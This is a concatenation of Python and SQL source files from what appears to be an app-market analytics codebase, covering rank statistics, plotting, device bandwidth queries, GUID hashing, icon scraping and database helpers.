df_ranks = pd.DataFrame(columns=['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id'])
for root, dirs, files in os.walk(ranks_dir):
for f in files:
fullpath = os.path.join(root, f)
df_ranks = df_ranks.append(pd.read_csv(fullpath), ignore_index=True)
df_actuals = pd.read_csv(actuals_file)
df_ranks = df_ranks.merge(df_actuals, on=['app_id', 'date'])
return df_ranks[['category_id', 'rank', 'app_id', 'date', 'feed_id', 'store_id', 'units']]
def gen_weights(df, K=12345):
weights = pd.DataFrame(K/df.groupby('date')['units'].sum()).reset_index()
weights.rename(columns={'units':'weight'}, inplace=True)
df = df.merge(weights, on='date')
return df
def gen_daily_statistics(df, quantiles, K=12345):
gdf = df.groupby('date')
s = 1.0/quantiles
ndf = gdf['date'].count().reset_index()
ndf.rename(columns={0: 'count'}, inplace=True)
ndf = ndf.merge(gdf['units'].sum().reset_index(), on='date')
ndf.rename(columns={'units': 'sum_actuals'}, inplace=True)
ndf['sum_actuals'] = np.log(ndf['sum_actuals'])
ndf['weight'] = K/ndf[['sum_actuals']]
for step in np.arange(0, 1+s, s):
ndf = ndf.merge(gdf['rank'].quantile(step).reset_index(), on='date')
ndf.rename(columns={0: 'rank_quantile_%s'%step}, inplace=True)
ndf = ndf.merge(gdf['units'].quantile(step).reset_index(), on='date')
ndf.rename(columns={0: 'actuals_quantile_%s'%step}, inplace=True)
return ndf
def normalize_df(df):
for column, series in df.iteritems():
try:
df[column] = df[column]*1.0/df[column].max()
except:
pass
return df
def filter_out_universals(df):
rdf = df
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
cdf = df[df['category_id']==category][['date', 'app_id', 'feed_id', 'category_id']]
fdf = cdf[(cdf['feed_id']==0) | (cdf['feed_id']==101)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['remove'] = True
fdf['category_id'] = category
fdf['feed_id'] = 0
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf['feed_id'] = 101
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf = cdf[(cdf['feed_id']==1) | (cdf['feed_id']==100)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['remove'] = True
fdf['feed_id'] = 1
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf['feed_id'] = 100
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf = cdf[(cdf['feed_id']==2) | (cdf['feed_id']==102)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['remove'] = True
fdf['feed_id'] = 2
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
fdf['feed_id'] = 102
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
rdf = rdf[rdf['remove'] != True].drop('remove', axis=1)
return rdf
def plot_stats(df, country):
df = df[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id', 'units']]
#df = df[df['category_id'] == category]
#df = df[df['feed_id'] == feed]
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
andf = df[df['category_id'] == category]
for index2, series2 in andf[['feed_id']].drop_duplicates().iterrows():
feed = series2['feed_id']
ndf = andf[andf['feed_id'] == feed]
ndf = gen_daily_statistics(ndf, 4)
ndf = normalize_df(ndf)
ndf = ndf.reindex_axis(sorted(ndf.columns), axis=1)
#fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(30, 10))
ndf[['rank_quantile_0.0', 'rank_quantile_0.25','rank_quantile_0.5','rank_quantile_0.75','rank_quantile_1.0',]] \
.plot() \
.grid(True, which='both')
#corr = ndf['sum_actuals'].corr(ndf['rank_quantile_0.5'])
plt.title('Quantiles of ranks')
plt.savefig(plots_dir+'stats/rank_%s_%s_%s.png'%(country, category, feed))
ndf[['actuals_quantile_0.0', 'actuals_quantile_0.25','actuals_quantile_0.5','actuals_quantile_0.75','actuals_quantile_1.0',]] \
.plot() \
.grid(True, which='both')
#corr = ndf['sum_actuals'].corr(ndf['actuals_quantile_0.5'])
plt.title('Quantiles of actuals')
plt.savefig(plots_dir+'stats/actuals_%s_%s_%s.png'%(country, category, feed))
ndf[['sum_actuals', 'count']] \
.plot() \
.grid(True, which='both')
#plt.title('%s_%s_%s'%(country, category, feed))
corr = ndf['sum_actuals'].corr(ndf['count'])
plt.title('sum_actuals vs count')
plt.savefig(plots_dir+'stats/count_%s_%s_%s.png'%(country, category, feed))
def plot_rank_buckets(df, country, function, bucket_size=100, max_rank=1000):
limit = np.arange(0, max_rank+bucket_size, bucket_size)
weekdays = get_weekdays(df)
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
andf = df[df['category_id'] == category]
for index2, series2 in andf[['feed_id']].drop_duplicates().iterrows():
feed = series2['feed_id']
ndf = andf[andf['feed_id'] == feed]
p = []
labels = []
plt.clf()
fig = plt.figure(1)
ax = fig.add_subplot(111)
for i in range(len(limit)-1):
rdf = ndf[(ndf['rank']>limit[i]) & (ndf['rank']<=limit[i+1])]
if rdf.shape[0]>0:
rdf = rdf.groupby('date')
if function == 'count':
rdf = rdf.count()
elif function == 'sum':
rdf = normalize_df(rdf.sum())
elif function == 'avg':
rdf = normalize_df(rdf.mean())
p1, = ax.plot(rdf['units'])
p.append(p1)
labels.append('%s-%s'%(limit[i]+1, limit[i+1]))
ax.set_title('%s_actuals by buckets of ranks'%function)
ax.grid(True, which='both')
ax.set_xlabel('Day')
ax.set_ylabel(function)
ax.legend(p, labels)
ax.xaxis.set_ticks(np.arange(0, len(weekdays)+1, 7))
#ax.set_xticklabels(weekdays)
plt.savefig(plots_dir+'stats/bucket_%s_%s_%s_%s.png'%(function, country, category, feed))
def get_weekdays(df):
ddf = df['date'].drop_duplicates().reset_index()['date']
dr = pd.DateRange(ddf.min(), ddf.max(), offset=pd.datetools.Day())
weekdays = []
for date in dr:
weekdays.append(date.weekday()+1)
return weekdays
if __name__ == '__main__':
plots_dir = './plots/'
actuals_file = './cache/references/real_units_143441_2012-07_Downloads.csv'
downloads_file = './cache/monthly/United States_2012-07_Downloads.csv'
country = 143441
category = 36
feed = 0
df = pd.read_csv(downloads_file)
#df = filter_out_universals(df)
#plot_stats(df, country)
#plot_rank_buckets(df, country, 'count', 200)
#plot_rank_buckets(df, country, 'sum', 200)
plot_rank_buckets(df, country, 'avg', 200)
sys.exit(0)
df = pd.read_csv(downloads_file)
df = df[['category_id', 'rank', 'app_id', 'date', 'feed_id', 'store_id', 'units']]
df = df[df['category_id'] == category]
df = df[df['feed_id'] == feed]
train_set, test_set, weights = build_model(df,20)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
prefix = 'Filtered_'
plot_sets(train_set, test_set, 1000, fig_file=plots_dir+prefix+'Base_model_top1000.png')
plot_sets(train_set, test_set, 50, fig_file=plots_dir+prefix+'Base_model_top50.png')
plot_sets(train_set, test_set, 20, fig_file=plots_dir+prefix+'Base_model_top20.png')
train_set, test_set, weights = build_model(df, 20, 123456789)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png')
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png')
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png')
plot_weights(weights, plots_dir+prefix+'Weights.png')
prefix = 'Filtered_Actuals_123456789_'
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png', plot_actuals=True)
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png', plot_actuals=True)
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png', plot_actuals=True)
train_set, test_set, weights = build_model(df, 20, 1)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
prefix = 'Filtered_Actuals_1_'
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png', plot_actuals=True)
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png', plot_actuals=True)
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png', plot_actuals=True)
train_set, test_set, weights = build_model(df, 20, 100000)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
prefix = 'Filtered_Actuals_100000_'
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png', plot_actuals=True)
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png', plot_actuals=True)
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png', plot_actuals=True)
df = get_ranked_apps(actuals_file)
df = df[df['category_id'] == category]
df = df[df['feed_id'] == feed]
train_set, test_set, weights = build_model(df,20)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
prefix = 'Unfiltered_'
plot_sets(train_set, test_set, 1000, fig_file=plots_dir+prefix+'Base_model_top1000.png')
plot_sets(train_set, test_set, 50, fig_file=plots_dir+prefix+'Base_model_top50.png')
plot_sets(train_set, test_set, 20, fig_file=plots_dir+prefix+'Base_model_top20.png')
train_set, test_set, weights = build_model(df, 20, 123456789)
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png')
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png')
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png')
plot_weights(weights, plots_dir+prefix+'Weights.png')
df = pd.read_csv('./data_merged/United States_2012-07-01--2012-07-31_Downloads.csv')
df.rename(columns={'original_estimate': 'estimate', 'weighted_estimate': 'scaled_estimate'}, inplace=True)
df = df[['category_id', 'rank', 'app_id', 'date', 'feed_id', 'store_id', 'units', 'estimate', 'scaled_estimate']]
df = df[df['category_id'] == category]
df = df[df['feed_id'] == feed]
df['weight'] = 1.0
#weights = pd.read_csv('./cache/143441_36_weigths.csv')
#weights = weights[weights['category_id'] == 36]
#weights = weights[weights['feed_id'] == 0]
#weights = weights[['date', 'weight']]
#df = df.merge(weights, on='date')
df['date'] = df['date'].map(lambda x: x.replace(' 00:00:00',''))
train_set, test_set = split_train_test(df,20)
prefix = 'Production_Filtered_'
train_set = append_weekdays(train_set)
test_set = append_weekdays(test_set)
plot_sets(train_set, test_set, 1000, fig_file=plots_dir+prefix+'Base_model_top1000.png')
plot_sets(train_set, test_set, 50, fig_file=plots_dir+prefix+'Base_model_top50.png')
plot_sets(train_set, test_set, 20, fig_file=plots_dir+prefix+'Base_model_top20.png')
plot_sets(train_set, test_set, 1000, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top1000.png')
plot_sets(train_set, test_set, 50, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top50.png')
plot_sets(train_set, test_set, 20, weights=True, fig_file=plots_dir+prefix+'Scaled_model_top20.png')
#plot_weights(weights, plots_dir+prefix+'Weights.png')
<file_sep>/aa_au_model/heavy_usage/sql/get_monthly_device_bandwidth.sql
-- Get monthly bandwidth per device for iOS on VPN Defender
set start_date = '2015-03-01';
set end_date = '2015-05-31';
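-- Example invocation (assumed): hive -f get_monthly_device_bandwidth.sql
-- The SET statements above supply the ${hiveconf:...} variables used below.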
drop table if exists ios_device_bandwidth;
create table ios_device_bandwidth (
device_id string,
device_type string,
year int,
month int,
total_bandwidth float)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/ios_device_bandwidth'
;
insert overwrite table ios_device_bandwidth
select
x.device_id,
x.type as device_type,
x.year,
x.month,
x.total_bandwidth
from (
select
c.device_id,
max(d.type) as type,
year(c.datestr) as year,
month(c.datestr) as month,
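        -- 1073741824 = 1024^3 bytes, so total_bandwidth is expressed in GiB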
sum(c.output_bytes + c.input_bytes) / 1073741824 as total_bandwidth
from
vpn_new_device_info d
join vpn_sample_data_connection_session c
on d.device_id = c.device_id
where
d.platform = 'iOS'
and c.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
group by
year(c.datestr),
month(c.datestr),
c.device_id
order by
device_id desc
) x
;<file_sep>/aa_au_model/mdm/mdm/__init__.py
__author__ = 'hgriffioen'
import data
import hashlib
def hash_guid(guid, platform):
"""
Hash the GUID to the format used by Aardvark backend.
:param guid: Series with GUIDs
:param platform: Series with platforms for GUIDs
:return: Series with hashed GUIDs
Example:
$ dim_guid = mdm.data.load_dim_guid()
$ dim_guid['hashed_guid'] = hash_guid(dim_guid.guid, dim_guid.device_platform)
"""
denormalized_guid = guid.copy()
    # iOS GUIDs are sent to the backend denormalized but are stored normalized in the table.
is_ios = platform == 'ios'
denormalized_guid[is_ios] = guid[is_ios].apply(denormalize_ios_guid)
return denormalized_guid.apply(lambda x: hashlib.sha256(x).hexdigest())
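# Minimal usage sketch (illustrative only; assumes pandas is available, which
# this module does not itself import):
def _example_hash_guid():
    import pandas as pd
    guids = pd.Series(['006cd3b1feb041c98ae223eacfbad2e0'])
    platforms = pd.Series(['ios'])
    # The iOS GUID is denormalized first, so this hashes
    # '006CD3B1-FEB0-41C9-8AE2-23EACFBAD2E0' with SHA-256.
    return hash_guid(guids, platforms)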
def denormalize_ios_guid(g):
"""
Convert a normalized iOS GUID to denormalized format.
For instance, 006cd3b1feb041c98ae223eacfbad2e0 is converted to
006CD3B1-FEB0-41C9-8AE2-23EACFBAD2E0.
:param g: String with normalized GUID
:return: String with denormalized GUID
"""
return '-'.join((g[0:8], g[8:12], g[12:16], g[16:20], g[20:])).upper()<file_sep>/icon-matching-framework/lib/scraping.py
"""
Module for scraping. Main functions:
- scrape_icons: Scrape all icons for matched apps.
Note that the hierarchy of saving the icons is similar to how they are scraped:
- scraping: $ASSET_URL$/$MARKET$/$ICON_URL$
- saving: $ICON_DIR$/$MARKET$/$ICON_URL$
See constants.py for constants.
"""
import errno
import database_interface
import icon_processing
import multiprocessing
import numpy as np
import os
import pandas as pd
import shutil
import time
from config import (ICON_DIR, N_PARALLEL_SCRAPING)
ICON_TO_FILTER = icon_processing.get_no_icon()
def scrape_icons(connection=None):
"""
Scrape all icons for Distimo's matched apps.
:param connection: Connection to database
:return: None
"""
clear_icon_dirs()
create_icon_dirs()
matched_apps = get_matched_apps(connection)
icon_urls = generate_icon_urls(matched_apps)
icon_paths = generate_icon_paths(matched_apps)
icon_data_set = zip(icon_urls, icon_paths)
retrieve_icons(icon_data_set)
def scrape_icons_aa(market):
"""
Scrape all icons for AA's matched apps. Loads AA's matched apps from data/matched_$MARKET$)_apps.csv.
See Notebook 'Get AA Android and iOS matches' for creating this csv.
:param market: Market to scrape: 'ios' or 'gp'
:return: None
"""
clear_icon_dirs([market])
create_icon_dirs([market])
matched_apps = pd.DataFrame.from_csv('data/matched_' + market + '_apps.csv', index_col=False)
matched_apps = matched_apps.ix[matched_apps.icon_url.notnull()]
icon_urls = matched_apps.icon_url.values
icon_paths = generate_icon_paths(matched_apps)
icon_data_set = zip(icon_urls, icon_paths)
retrieve_icons_sequentially(icon_data_set)
def clear_icon_dirs(store_ids=None):
"""
Delete subdirectories in icons/ folder.
:param store_ids: List with store IDs to clear (e.g. [1, 2], ['gp'] or ['gp', 'ios', 1]).
:return: None
"""
if store_ids is None:
store_ids = [1, 2, 10]
icon_dir_path = lambda x: os.getcwd() + '/' + ICON_DIR + str(x)
map(shutil.rmtree, map(icon_dir_path, store_ids))
def create_icon_dirs(store_ids=None):
"""
Create directories for markets.
:param store_ids: List with store IDs to create (e.g. [1, 2], ['gp'] or ['gp', 'ios', 1]).
:return: None
"""
if store_ids is None:
store_ids = [1, 2, 10]
icon_path = lambda x: os.getcwd() + '/' + ICON_DIR + str(x) + '/'
map(mkdir_p, map(icon_path, store_ids))
def mkdir_p(path):
"""
Create directory.
:param path: Path to directory
:return: None
"""
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def get_matched_apps(connection=None):
"""
Get all matched apps.
:param connection: Connection to database
:return: DataFrame with matched apps
"""
dbi = database_interface.DistimoDatabase(connection)
return dbi.query_matched_apps()
def generate_icon_paths(matched_apps):
"""
Generate local paths to the icons.
:param matched_apps: DataFrame with matched apps.
    :return: List with strings containing local paths.
"""
icon_names = ICON_DIR + matched_apps['market'].astype(str) + '/' + matched_apps['id'].astype(str)
return icon_names.values.tolist()
def generate_icon_urls(matched_apps, asset_url=None):
"""
Generate urls to icons.
:param matched_apps: DataFrame with matched apps.
:param asset_url: Url to retrieve icons from
    :return: List with strings containing the icon URLs.
"""
icon_urls = ICON_DIR + matched_apps['market'].astype(str) + '/' + matched_apps['icon_url']
if asset_url is None:
generate_asset_url = lambda x: ('http://assets-0%s.distimo.com/' %
str(np.random.randint(1, 4))) + x + '?size=64'
else:
generate_asset_url = lambda x: asset_url + x
return map(generate_asset_url, icon_urls)
def retrieve_icons(icon_data_set, n_parallel=N_PARALLEL_SCRAPING):
"""
Retrieve all icons using parallel processing.
:param icon_data_set: List of lists containing icon paths and urls
:return: None
"""
pool = multiprocessing.Pool(n_parallel)
pool.map(get_image, icon_data_set)
def retrieve_icons_sequentially(icon_data_set, sleep=None):
"""
Retrieve all icons sequentially.
:param icon_data_set: List of lists containing icon paths and urls
:param sleep: Time to sleep
:return: None
"""
    for icon_url, icon_path in icon_data_set:
        icon_processing.get_raw_image(icon_url, icon_path)
if sleep:
time.sleep(sleep)
def get_image(icon_data):
"""
Wrapper for calling icon_processing.get_raw_image.
:param icon_data: List with icon URL and filename to save to
:return: None
"""
icon_processing.get_raw_image(icon_data[0], filename=icon_data[1], raw_filter_image=ICON_TO_FILTER)
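# Minimal usage sketch (comment-only, since running it scrapes for real):
#
#   scrape_icons_aa('gp')   # wipes and recreates icons/gp/, then downloads
#                           # every icon listed in data/matched_gp_apps.csv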
<file_sep>/ranking_change/test_read_rank_files.py
#!/usr/bin/env python
from read_rank_files import *
#df = load_ranks_file('/Users/riwatt/Work/new_ranks/ranking_2013-07-01.sql', ['United States'], ['36', '6014'])#, 'Germany'])
df = load_ranks_file('/Users/riwatt/Work/new_ranks/ranking_2013-07-01.sql', ['United States', 'Germany'])
df.to_csv('ranking-2013-07-01-US.csv', index=False)
<file_sep>/exact-matching-improvement/lib/temp_database.py
import pandas as pd
import config as cf
import psycopg2
from queries import db_links, ios_queries, android_queries, general_queries, metric_queries
'''
Library that manages interaction between IPython notebooks and the DS temp database.
'''
def create_aa_connection_from_config():
return psycopg2.connect(database=cf.database, user=cf.user, password=<PASSWORD>, host=cf.host)
def create_temp_connection_from_config():
return psycopg2.connect(database=cf.database, user=cf.user, password=<PASSWORD>, host=cf.temp_host)
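# Typical flow (sketch): the generate_* helpers below create the temp tables
# once, then read them back on subsequent calls, e.g.
#
#   features = generate_ios_features(regenerate=True)  # (re)build + fetch
#   features = generate_ios_features()                 # fetch existing tables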
def generate_ios_features(connection=None, regenerate=False):
result = None
if connection is None:
connection = create_temp_connection_from_config()
if regenerate:
cur = connection.cursor()
cur.execute(db_links['ios_link'])
cur.execute(ios_queries['drop_ios_matches'])
cur.execute(ios_queries['create_ios_matches'])
cur.execute(ios_queries['drop_ios_apps'])
cur.execute(ios_queries['create_ios_apps'])
cur.execute(ios_queries['create_ios_features'])
connection.commit()
result = pd.read_sql(ios_queries['select_ios_features'], connection)
connection.close()
return result
def generate_android_features(connection=None, regenerate=False):
if connection is None:
connection = create_temp_connection_from_config()
if regenerate:
cur = connection.cursor()
cur.execute(db_links['ios_link'])
cur.execute(db_links['android_link'])
cur.execute(android_queries['drop_android_matches'])
cur.execute(android_queries['create_android_matches'])
cur.execute(android_queries['drop_android_apps'])
cur.execute(android_queries['create_android_apps'])
cur.execute(android_queries['create_android_features'])
connection.commit()
result = pd.read_sql(android_queries['select_android_features'], connection)
connection.close()
return result
def generate_all_features(connection=None, regenerate=False):
if connection is None:
connection = create_temp_connection_from_config()
if regenerate:
cur = connection.cursor()
cur.execute(db_links['ios_link'])
cur.execute(db_links['android_link'])
cur.execute(android_queries['drop_android_matches'])
cur.execute(android_queries['create_android_matches'])
cur.execute(android_queries['drop_android_apps'])
cur.execute(android_queries['create_android_apps'])
cur.execute(ios_queries['drop_ios_matches'])
cur.execute(ios_queries['create_ios_matches'])
cur.execute(ios_queries['drop_ios_apps'])
cur.execute(ios_queries['create_ios_apps'])
cur.execute(general_queries['create_all_features'])
connection.commit()
result = pd.read_sql(general_queries['select_all_features'], connection)
connection.close()
return result
def generate_excluded_term_list(connection=None, type=None):
result = None
if connection is None:
connection = create_aa_connection_from_config()
cur = connection.cursor()
cur.execute(db_links['ios_link']) # use ios_link since dna data is stored in aa database
sql_result = pd.read_sql(general_queries['select_dna_excluded_terms'].format(type=type), connection)
result = sql_result.iloc[0, 0].split('\n')
connection.close()
return result
def create_new_processed_feature_table(df, new_feature_name, new_feature_type, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
cur = connection.cursor()
cur.execute(general_queries['drop_processed_dna_feature'].format(new_feature=new_feature_name))
cur.execute(general_queries['create_processed_dna_feature_table'].format(new_feature=new_feature_name
, feature_type=new_feature_type))
insert_statement = general_queries['insert_processed_dna_feature'].format(new_feature=new_feature_name
, feature_type=new_feature_type)
cur.executemany(insert_statement, df.T.to_dict().values())
connection.commit()
connection.close()
def create_new_levenshtein_metric_table(feature_name, feature_table_name, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
cur = connection.cursor()
cur.execute(metric_queries['create_dna_levenshtein_metric_table'].format(feature_name=feature_name
, feature_table_name=feature_table_name))
connection.commit()
connection.close()
def create_new_extended_levenshtein_metric_table(feature_name, original_feature_name, feature_table_name, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
cur = connection.cursor()
cur.execute(metric_queries['create_dna_extended_levenshtein_metric_table'].format(feature_name=feature_name
, original_feature_name=original_feature_name
, feature_table_name=feature_table_name))
connection.commit()
connection.close()
def get_metric_for_feature(feature_name, match_criterion=None, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
if match_criterion is None:
result = pd.read_sql(metric_queries['select_dna_metric_levenshtein'].
format(feature_name=feature_name), connection)
else:
result = pd.read_sql(metric_queries['select_dna_metric_levenshtein_with_citerion'].
format(feature_name=feature_name, match_criterion=match_criterion), connection)
connection.commit()
connection.close()
return result
def get_sample_metric_for_feature_app(feature_name, n_apps=1, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
result = pd.read_sql(metric_queries['select_dna_metric_levenshtein_sample_app'].
format(feature_name=feature_name, n_apps=n_apps), connection)
connection.commit()
connection.close()
return result
def get_sample_from_table(table_name, num_samples=1000000, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
result = pd.read_sql(metric_queries['select_dna_sample'].
format(table_name=table_name, num_samples=num_samples), connection)
connection.commit()
connection.close()
return result
def get_extended_metric_for_feature(feature_name, criterion, lower_bound, upper_bound, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
result = pd.read_sql(metric_queries['select_dna_metric_levenshtein_extended'].
format(feature_name=feature_name, criterion=criterion, lower_bound=lower_bound,
upper_bound=upper_bound), connection)
connection.commit()
connection.close()
return result
def get_confusion_matrix(type, label, table, feature_name, threshold_value=1.0, connection=None):
if connection is None:
connection = create_temp_connection_from_config()
if type == 'real':
result = pd.read_sql(metric_queries['select_confusion_matrix_real'].
format(feature_name=feature_name, threshold_value=threshold_value, label=label,
table=table), connection)
elif type == 'bool':
result = pd.read_sql(metric_queries['select_confusion_matrix_bool'].
format(feature_name=feature_name, threshold_value=threshold_value, label=label,
table=table), connection)
connection.commit()
connection.close()
return result
def get_icon_input(connection=None):
if connection is None:
connection = create_temp_connection_from_config()
result = pd.read_sql(general_queries['select_icon_input'], connection)
connection.commit()
connection.close()
return result
<file_sep>/evaluation/py/concat_results.py
'''
Created on Jul 1, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
if __name__ == '__main__':
dfs = []
for (dirpath, dirnames, filenames) in os.walk('../data'):
for filename in filenames:
if filename == 'result.csv':
metadata = dirpath.split('/')
device = metadata[2].split('_')[0]
model = '_'.join(metadata[2].split('_')[1:])
month = metadata[3]
filepath = os.sep.join([dirpath, filename])
df = pd.read_csv(filepath)
df['device'] = device
df['model'] = model
df['month'] = month
dfs.append(df)
df = pd.concat(dfs)
df.sort(['device','model', 'month', 'period', 'unit', 'country'], inplace=True)
df.to_csv('../data/all_results.csv',index=False)
<file_sep>/int-vs-m-benchmark/sql/ios/1000f2-refine_application_data-recheck_price_changes.sql
/*
FUNCTIONAL DESCRIPTION : Check for price changes for the total time period in a country.
*/
DROP TEMPORARY TABLE IF EXISTS temp.apps_with_price_changes;
CREATE TEMPORARY TABLE temp.apps_with_price_changes(
country_id smallint(5) unsigned NOT NULL,
application_id INT(10) UNSIGNED NOT NULL,
CONSTRAINT PRIMARY KEY (country_id, application_id)
)
AS
select
country_id,
application_id,
max(price_changed) as price_changed
from
temp.application_data
group by
country_id,
application_id
having
price_changed = 1
;
UPDATE temp.application_data d
JOIN temp.apps_with_price_changes p
ON p.country_id = d.country_id
AND p.application_id = d.application_id
SET d.price_changed = 1;<file_sep>/google-analytics/rincon_dump/validation_exporter.py
import dill
import copy
import pandas as pd
import numpy as np
cntry_list = ['US','GB']
dev_list = ['iPhone','Android Mobile']
modelName = 'logLog'
for cntry in cntry_list:
for dev in dev_list:
        # convert the strings to lists so they can be iterated over
if type(cntry) == str:
cntry = [cntry]
if type(dev) == str:
dev = [dev]
print cntry, dev
fileObject = open('./class/{}/Rincon_Class_{}_{}.dill'.format(modelName, cntry[0], dev[0]), 'r')
new_class_ = dill.load(fileObject)
mdm_dat = pd.read_csv('../data/MDM_0118_AppNameAttached.csv')
mdm_dat['category_id'] = mdm_dat['category_id'].apply(int).apply(str)
val_data = mdm_dat[(mdm_dat['Country'].isin(cntry))
& (mdm_dat['Device Type'].isin(dev))
].copy()
fileObject.close()
pred_new = new_class_[0].predict(val_data)
pred_new['diff'] = pred_new['final_pred'] - pred_new['reporters_app']
pred_new['diff%'] = pred_new['final_pred'] / pred_new['reporters_app'] - 1.0
pred_new.sort('diff', ascending=False)[:1000].to_csv('./temp/{}/Top100_Diff_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
pred_new.sort('diff', ascending=True)[:1000].to_csv('./temp/{}/Top100_MinusDiff_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
pred_new.sort('diff%', ascending=False)[:1000].to_csv('./temp/{}/Top100_Diff%_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
pred_new.sort('diff%', ascending=True)[:1000].to_csv('./temp/{}/Top100_MinusDiff%_{}_{}.csv'.\
format(modelName, cntry, dev), index=False, header=False)
pred_new.groupby(['Country', 'Device Type', 'Date', 'bundle_id', 'app_id',
'app_name','category_name','final_pred']).\
agg({'reporters_app':'sum'})['reporters_app'].\
groupby(level=['Country', 'Device Type', 'Date'], group_keys=False).\
apply(lambda x: x.order(ascending=False).head(200)).\
to_csv('./temp/{}/Top200_MAU_{}_{}.csv'.format(modelName, cntry, dev), index=True, header=False)
<file_sep>/aa_au_model/correction/utils.py
__author__ = 'hgriffioen'
import datetime
import numpy as np
import pandas as pd
import sklearn
from sklearn import metrics  # makes sklearn.metrics available for roc_auc_score below
from sklearn import preprocessing
def get_start_date(end_date, time_frame):
"""
Get start date for an end date.
:param end_date: datetime.date with period end
:param time_frame: time frame ('weekly' or 'monthly')
:return: datetime.date with period start
"""
validate_end_date(end_date, time_frame)
if time_frame == 'weekly':
start_date = end_date - datetime.timedelta(days=6)
elif time_frame == 'monthly':
start_date = end_date.replace(day=1)
else:
raise Exception('Unknown time frame: %s' % time_frame)
return start_date
def get_end_date(start_date, time_frame):
"""
Get end date for a start date.
:param start_date: datetime.date with any date
:param time_frame: time frame ('weekly' or 'monthly')
:return: datetime.date with period end
"""
validate_start_date(start_date, time_frame)
if time_frame == 'weekly':
end_date = start_date + datetime.timedelta(days=(6-(start_date.isoweekday() % 7)))
elif time_frame == 'monthly':
next_month = (start_date.month % 12 + 1, start_date.year + start_date.month / 12)
end_date = (start_date.replace(month=next_month[0], year=next_month[1], day=1) -
datetime.timedelta(days=1))
else:
raise Exception('Unknown time frame: %s' % time_frame)
return end_date
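# Quick sanity sketch for the helpers above; the dates are chosen so that
# validation passes (2015-03-01 is a Sunday and the first of its month):
def _example_period_bounds():
    week_end = get_end_date(datetime.date(2015, 3, 1), 'weekly')         # -> 2015-03-07 (Saturday)
    month_start = get_start_date(datetime.date(2015, 3, 31), 'monthly')  # -> 2015-03-01
    return week_end, month_start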
def generate_date_range(period_start, period_end, time_frame):
"""
Generate valid date range.
